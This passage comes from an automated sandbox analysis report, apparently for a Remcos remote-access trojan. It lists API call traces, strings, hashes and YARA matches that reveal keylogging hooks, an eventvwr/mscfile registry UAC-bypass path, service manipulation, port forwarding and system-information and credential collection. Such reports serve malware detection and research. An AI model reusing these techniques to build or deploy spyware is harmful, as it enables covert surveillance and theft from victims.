                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,006E5E19,00000000), ref: 006E64A5
                                    • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,006E5E19,00000000), ref: 006E64B4
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,006E5E19,00000000), ref: 006E64C5
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,006E5E19,00000000), ref: 006E64C8
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Service$CloseHandle$Open$ControlManager
                                    • String ID:
                                    • API String ID: 221034970-0
                                    • Opcode ID: 2a6e7e159091bc8f0a23fb250dfb5f905aaa6614f92fb3340813bb1afe896aac
                                    • Instruction ID: 9de49106d414b0cf12f5842d4eb8afb3386eef74dafc16a2ae31aec4135de138
                                    • Opcode Fuzzy Hash: 2a6e7e159091bc8f0a23fb250dfb5f905aaa6614f92fb3340813bb1afe896aac
                                    • Instruction Fuzzy Hash: 8D11E931A4121CBFD630AB65DC85DBF3B7EDB523917008015F91592280EB6C4E0796B5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • _free.LIBCMT ref: 00711C02
                                      • Part of subcall function 007101F5: HeapFree.KERNEL32(00000000,00000000,?,00718EEF,?,00000000,?,00000000,?,00719193,?,00000007,?,?,007196DE,?), ref: 0071020B
                                      • Part of subcall function 007101F5: GetLastError.KERNEL32(?,?,00718EEF,?,00000000,?,00000000,?,00719193,?,00000007,?,?,007196DE,?,?), ref: 0071021D
                                    • _free.LIBCMT ref: 00711C0E
                                    • _free.LIBCMT ref: 00711C19
                                    • _free.LIBCMT ref: 00711C24
                                    • _free.LIBCMT ref: 00711C2F
                                    • _free.LIBCMT ref: 00711C3A
                                    • _free.LIBCMT ref: 00711C45
                                    • _free.LIBCMT ref: 00711C50
                                    • _free.LIBCMT ref: 00711C5B
                                    • _free.LIBCMT ref: 00711C69
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 9735cf8cc7062d9dbd771a740f023478b474e5e95306c8de554a4d61fd67fc52
                                    • Instruction ID: 8b57a8318d16988cc34458958dab9ae16fc1bdfb4621d4bfbc29a9793630fc6b
                                    • Opcode Fuzzy Hash: 9735cf8cc7062d9dbd771a740f023478b474e5e95306c8de554a4d61fd67fc52
                                    • Instruction Fuzzy Hash: 4F119276140148FFCB01EF98CD46CDD3BA5FF05350B4141A5BB088F2A2DA79DAD4AB80
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: CountEventTick
                                    • String ID: 8Em
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • __EH_prolog.LIBCMT ref: 006E593D
                                    • GdiplusStartup.GDIPLUS(0073BEA0,?,00000000), ref: 006E596F
                                      • Part of subcall function 006D7514: char_traits.LIBCPMT ref: 006D752F
                                      • Part of subcall function 006E576E: DeleteFileW.KERNEL32(00000000,0000001B), ref: 006E5858
                                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 006E59FB
                                    • Sleep.KERNEL32(000003E8), ref: 006E5A81
                                    • GetLocalTime.KERNEL32(?), ref: 006E5A89
                                    • Sleep.KERNEL32(00000000,00000018,00000000), ref: 006E5B78
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: Sleep$CreateDeleteDirectoryFileGdiplusH_prologLocalStartupTimechar_traits
                                    • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0072067F), ref: 0071FB57
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: DecodePointer
                                    • String ID: acos$asin$exp$log$log10$pow$sqrt
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,007152E3,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 00714BB0
                                    • __fassign.LIBCMT ref: 00714C2B
                                    • __fassign.LIBCMT ref: 00714C46
                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 00714C6C
                                    • WriteFile.KERNEL32(?,FF8BC35D,00000000,Rq,00000000,?,?,?,?,?,?,?,?,?,007152E3,?), ref: 00714C8B
                                    • WriteFile.KERNEL32(?,?,00000001,Rq,00000000,?,?,?,?,?,?,?,?,?,007152E3,?), ref: 00714CC4
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                    • String ID: Rq
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 006D9E69: char_traits.LIBCPMT ref: 006D9E79
                                    • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 006E36D4
                                      • Part of subcall function 006E79DC: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000,?,006D4230,0072F464), ref: 006E79F9
                                    • Sleep.KERNEL32(00000064), ref: 006E3700
                                    • DeleteFileW.KERNEL32(00000000), ref: 006E3734
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: File$CreateDeleteExecuteShellSleepchar_traits
                                    • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 006DEB01
                                    • int.LIBCPMT ref: 006DEB14
                                      • Part of subcall function 006DB94C: std::_Lockit::_Lockit.LIBCPMT ref: 006DB95D
                                      • Part of subcall function 006DB94C: std::_Lockit::~_Lockit.LIBCPMT ref: 006DB977
                                    • std::locale::_Getfacet.LIBCPMT ref: 006DEB1D
                                    • std::_Facet_Register.LIBCPMT ref: 006DEB54
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 006DEB5D
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 006DEB7B
                                    • std::exception::exception.LIBCMT ref: 006DEB8A
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::exception::exceptionstd::locale::_
                                    • String ID: Ym
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 006D88AD
                                    • SetWindowsHookExA.USER32 ref: 006D88BB
                                    • GetLastError.KERNEL32 ref: 006D88C7
                                      • Part of subcall function 006E6C80: GetLocalTime.KERNEL32(00000000), ref: 006E6C9A
                                    • GetMessageA.USER32 ref: 006D8915
                                    • TranslateMessage.USER32(?), ref: 006D8924
                                    • DispatchMessageA.USER32 ref: 006D892F
                                    Strings
                                    • Keylogger initialization failure: error , xrefs: 006D88DB
                                    • [ERROR], xrefs: 006D88ED
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                    • String ID: Keylogger initialization failure: error $[ERROR]
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 006E8D41
                                      • Part of subcall function 006E8DDA: RegisterClassExA.USER32(00000030), ref: 006E8E26
                                      • Part of subcall function 006E8DDA: CreateWindowExA.USER32 ref: 006E8E41
                                      • Part of subcall function 006E8DDA: GetLastError.KERNEL32 ref: 006E8E4B
                                    • ExtractIconA.SHELL32(00000000,?,00000000), ref: 006E8D78
                                    • lstrcpynA.KERNEL32(0073BED8,Remcos,00000080), ref: 006E8D92
                                    • Shell_NotifyIconA.SHELL32(00000000,0073BEC0), ref: 006E8DA8
                                    • TranslateMessage.USER32(?), ref: 006E8DB4
                                    • DispatchMessageA.USER32 ref: 006E8DBE
                                    • GetMessageA.USER32 ref: 006E8DCB
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                    • String ID: Remcos
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0071EBAE,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 0071E981
                                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0071EBAE,00000000,00000000,?,00000001,?,?,?,?), ref: 0071EA04
                                    • __alloca_probe_16.LIBCMT ref: 0071EA3C
                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,0071EBAE,?,0071EBAE,00000000,00000000,?,00000001,?,?,?,?), ref: 0071EA97
                                    • __alloca_probe_16.LIBCMT ref: 0071EAE6
                                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,0071EBAE,00000000,00000000,?,00000001,?,?,?,?), ref: 0071EAAE
                                      • Part of subcall function 0070F98C: HeapAlloc.KERNEL32(00000000,?,?,?,006FF244,?,?,006D1696,?,?,?,?,?), ref: 0070F9BE
                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,0071EBAE,00000000,00000000,?,00000001,?,?,?,?), ref: 0071EB2A
                                    • __freea.LIBCMT ref: 0071EB55
                                    • __freea.LIBCMT ref: 0071EB61
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocHeapInfo
                                    • String ID:
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 00711CE2: GetLastError.KERNEL32(00000000,?,00705545,?,?,?,00709965,?,006F8E1A,00000000,?,00000000,?,?,006F8E1A), ref: 00711CE6
                                      • Part of subcall function 00711CE2: _free.LIBCMT ref: 00711D19
                                      • Part of subcall function 00711CE2: SetLastError.KERNEL32(00000000,00709965,?,006F8E1A,00000000,?,00000000,?,?,006F8E1A), ref: 00711D5A
                                      • Part of subcall function 00711CE2: _abort.LIBCMT ref: 00711D60
                                    • _memcmp.LIBVCRUNTIME ref: 0070EC78
                                    • _free.LIBCMT ref: 0070ECE9
                                    • _free.LIBCMT ref: 0070ED02
                                    • _free.LIBCMT ref: 0070ED34
                                    • _free.LIBCMT ref: 0070ED3D
                                    • _free.LIBCMT ref: 0070ED49
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: _free$ErrorLast$_abort_memcmp
                                    • String ID: C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: Eventinet_ntoa
                                    • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 006E3F68: __EH_prolog.LIBCMT ref: 006E3F6D
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,0072F6BC), ref: 006E3E18
                                    • CloseHandle.KERNEL32(00000000), ref: 006E3E21
                                    • DeleteFileA.KERNEL32(00000000), ref: 006E3E30
                                    • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 006E3DE4
                                      • Part of subcall function 006D4AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 006D4B18
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                    • String ID: <$@$Temp
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 006D7514: char_traits.LIBCPMT ref: 006D752F
                                    • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000), ref: 006D6331
                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,000186A0,?), ref: 006D6379
                                    • CloseHandle.KERNEL32(00000000), ref: 006D63B3
                                    • MoveFileW.KERNEL32(00000000,00000000), ref: 006D63CB
                                    • CloseHandle.KERNEL32(?,00000057,?,00000008), ref: 006D63EF
                                    • DeleteFileW.KERNEL32(00000000), ref: 006D63FE
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: File$CloseHandle$CreateDeleteMoveWritechar_traits
                                    • String ID: .part
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,0072F724,0072F724,00000000), ref: 006D6046
                                    • ExitProcess.KERNEL32 ref: 006D6053
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: ExecuteExitProcessShell
                                    • String ID: Software\Classes\mscfile\shell\open\command$eventvwr.exe$mscfile\shell\open\command$open$origmsc
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,006E5D21,00000000), ref: 006E65ED
                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,006E5D21,00000000), ref: 006E6601
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,006E5D21,00000000), ref: 006E660E
                                    • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,006E5D21,00000000), ref: 006E6643
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,006E5D21,00000000), ref: 006E6655
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,006E5D21,00000000), ref: 006E6658
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                    • String ID: !]n
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,006E5F36,00000000), ref: 006E651E
                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,006E5F36,00000000), ref: 006E6532
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,006E5F36,00000000), ref: 006E653F
                                    • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,006E5F36,00000000), ref: 006E654E
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,006E5F36,00000000), ref: 006E6560
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,006E5F36,00000000), ref: 006E6563
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Service$CloseHandle$Open$ControlManager
                                    • String ID: 6_n
                                    • API String ID: 221034970-1217285620
                                    • Opcode ID: 7516a2ae45a56e37b88e25f94f825126c96d7bae95c4c94eb9863f157c962f52
                                    • Instruction ID: d6208c3767002402aacdc058fc0b0cb6d4eb9b0813d7c34ac0d73071208b949b
                                    • Opcode Fuzzy Hash: 7516a2ae45a56e37b88e25f94f825126c96d7bae95c4c94eb9863f157c962f52
                                    • Instruction Fuzzy Hash: FFF0F071A412187BD230AB65AC49EBF3B6EDB45390F00401AFE0996241EF7C8E0796F8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,?,006E6033,00000000), ref: 006E63B9
                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,006E6033,00000000), ref: 006E63CD
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,006E6033,00000000), ref: 006E63DA
                                    • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,006E6033,00000000), ref: 006E63E5
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,006E6033,00000000), ref: 006E63F7
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,006E6033,00000000), ref: 006E63FA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Service$CloseHandle$Open$ManagerStart
                                    • String ID: 3`n
                                    • API String ID: 276877138-379299107
                                    • Opcode ID: 89fa57c9394baf8a0f8aed933ed8777c2e6d6e622443ee4678cd1237a40ffd18
                                    • Instruction ID: 41baa3e662cb0dd7eb5d00c0b020563d19d5938c1c6fca01c2432a26466798f8
                                    • Opcode Fuzzy Hash: 89fa57c9394baf8a0f8aed933ed8777c2e6d6e622443ee4678cd1237a40ffd18
                                    • Instruction Fuzzy Hash: D1F0B4315412187FD2306B65AC88DBB3B6EDB413E0B004016F84586100DE6C8E46A6B8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,006F8E1A,?,?,?,00714840,00000001,00000001,?), ref: 00714649
                                    • __alloca_probe_16.LIBCMT ref: 00714681
                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,006F8E1A,?,?,?,00714840,00000001,00000001,?), ref: 007146CF
                                    • __alloca_probe_16.LIBCMT ref: 00714766
                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 007147C9
                                    • __freea.LIBCMT ref: 007147D6
                                      • Part of subcall function 0070F98C: HeapAlloc.KERNEL32(00000000,?,?,?,006FF244,?,?,006D1696,?,?,?,?,?), ref: 0070F9BE
                                    • __freea.LIBCMT ref: 007147DF
                                    • __freea.LIBCMT ref: 00714804
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
                                    • String ID:
                                    • API String ID: 2597970681-0
                                    • Opcode ID: 4fdc8dab8294ee21b7ee9be95be3d2dbb6bf71b7aa82f91988eede79b7e5077a
                                    • Instruction ID: 63f07e224ebbf1a11450908f77eab8cb687a7b843922f8a1977effd2313f536e
                                    • Opcode Fuzzy Hash: 4fdc8dab8294ee21b7ee9be95be3d2dbb6bf71b7aa82f91988eede79b7e5077a
                                    • Instruction Fuzzy Hash: 91519F72620216AFEF259E68CC85EFB77A9EB45760F154629FD04D61C0EB3CDC9086A0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • SendInput.USER32(00000001,00000001,0000001C,00000000,00000000), ref: 006E52BC
                                    • SendInput.USER32(00000001,00000001,0000001C,00000000,00000000,00000000), ref: 006E52DA
                                    • SendInput.USER32(00000001,00000001,0000001C,00000000,00000000,00000000), ref: 006E52F7
                                    • SendInput.USER32(00000001,00000001,0000001C,00000000,00000000,00000000), ref: 006E5309
                                    • SendInput.USER32(00000001,00000001,0000001C), ref: 006E5320
                                    • SendInput.USER32(00000001,00000001,0000001C), ref: 006E533D
                                    • SendInput.USER32(00000001,00000001,0000001C), ref: 006E5359
                                    • SendInput.USER32(00000001,?,0000001C,?), ref: 006E5376
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: InputSend
                                    • String ID:
                                    • API String ID: 3431551938-0
                                    • Opcode ID: e1d8f13154cc9fb903dcacbe876957753c57aae2609d5081dfb5d3bd066bc095
                                    • Instruction ID: 798ca64b986d80a540aa09f125479aaafb8ff6b127221e293a3039de864ed89d
                                    • Opcode Fuzzy Hash: e1d8f13154cc9fb903dcacbe876957753c57aae2609d5081dfb5d3bd066bc095
                                    • Instruction Fuzzy Hash: 24312071D9025CA9FB109BD1CC46FFEBB7CAF18B14F04000AE704AA1C2D6E996858BE1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 006E0323
                                      • Part of subcall function 006E7093: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,006D417D), ref: 006E70BA
                                      • Part of subcall function 006E432B: CloseHandle.KERNEL32(006D41F6,?,006D41F6,0072F464), ref: 006E4341
                                      • Part of subcall function 006E432B: CloseHandle.KERNEL32(0072F464,?,006D41F6,0072F464), ref: 006E434A
                                    • DeleteFileW.KERNEL32(00000000,0072F464,0072F464,0072F464), ref: 006E05A8
                                    • DeleteFileW.KERNEL32(00000000,0072F464,0072F464,0072F464), ref: 006E05D6
                                    • DeleteFileW.KERNEL32(00000000,0072F464,0072F464,0072F464), ref: 006E0604
                                    • Sleep.KERNEL32(000001F4,0072F464,0072F464,0072F464), ref: 006E061D
                                      • Part of subcall function 006D4AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 006D4B18
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: File$Delete$CloseHandle$CurrentModuleNameProcessSleepsend
                                    • String ID: /stext "
                                    • API String ID: 1351907930-3856184850
                                    • Opcode ID: b04cbcf1d5957a0b5ed53acd9b3700b894498a3bdb67ef09813ce474809d17d8
                                    • Instruction ID: b6ac726c717cb17e211e8bae7eb23150ee24fdc26cfce5da44cbd7b6be918389
                                    • Opcode Fuzzy Hash: b04cbcf1d5957a0b5ed53acd9b3700b894498a3bdb67ef09813ce474809d17d8
                                    • Instruction Fuzzy Hash: FED12531D142585BCB99FB60DC91AED73B7AF55300F4041AEE40AAB292EF705F89CB58
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: _free
                                    • String ID:
                                    • API String ID: 269201875-0
                                    • Opcode ID: 581303ba9b53f05d063bd197c06f5525988096203ebbe314346d2b933c73b206
                                    • Instruction ID: 1c7f670d9a7d3b62dcebba5a058e38464d1f76f46b35ac653c1dec175c8bfa05
                                    • Opcode Fuzzy Hash: 581303ba9b53f05d063bd197c06f5525988096203ebbe314346d2b933c73b206
                                    • Instruction Fuzzy Hash: AF61D271900205EFDB60DF6CC842BDEBBF5EB08710F144169E954EB2C1EB78AD858B91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0072913C), ref: 00712ECD
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,0073B754,000000FF,00000000,0000003F,00000000,?,?), ref: 00712F45
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,0073B7A8,000000FF,?,0000003F,00000000,?), ref: 00712F72
                                    • _free.LIBCMT ref: 00712EBB
                                      • Part of subcall function 007101F5: HeapFree.KERNEL32(00000000,00000000,?,00718EEF,?,00000000,?,00000000,?,00719193,?,00000007,?,?,007196DE,?), ref: 0071020B
                                      • Part of subcall function 007101F5: GetLastError.KERNEL32(?,?,00718EEF,?,00000000,?,00000000,?,00719193,?,00000007,?,?,007196DE,?,?), ref: 0071021D
                                    • _free.LIBCMT ref: 00713087
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                    • String ID: ~0q
                                    • API String ID: 1286116820-1500179217
                                    • Opcode ID: 8e44666c60dab387cc434b486dea1653083899add18d3c510506670ddcd83d99
                                    • Instruction ID: fb523988493dc09dbbfa3093aee11fded63a3cbf5703ae75a204206f29b1d4ec
                                    • Opcode Fuzzy Hash: 8e44666c60dab387cc434b486dea1653083899add18d3c510506670ddcd83d99
                                    • Instruction Fuzzy Hash: 4251E771900219EFDB10DF6CDC859EAB7BCEF40310F10426AE514971D2EB389E978B54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: LocalTime
                                    • String ID: %02i:%02i:%02i:%03i [Info] $Connection KeepAlive enabled$Connection KeepAlive timeout: %i$KeepAlive timeout changed to %i
                                    • API String ID: 481472006-2341810981
                                    • Opcode ID: 9e971957a911b8000bcd5b0e9109cfbae3d1e1deb060c9971ddd8bcf949dab59
                                    • Instruction ID: 8cb6fc180bbc9e18280dcede0e93b31ba84ea2cccaa0ce7c13f487489e305abc
                                    • Opcode Fuzzy Hash: 9e971957a911b8000bcd5b0e9109cfbae3d1e1deb060c9971ddd8bcf949dab59
                                    • Instruction Fuzzy Hash: 344108A2C00258BACB54FBB5DC55AFEB7FA9B19301F00405BF842E6291EB7C5A44D778
                                    Uniqueness

                                    Uniqueness Score: -1.00%

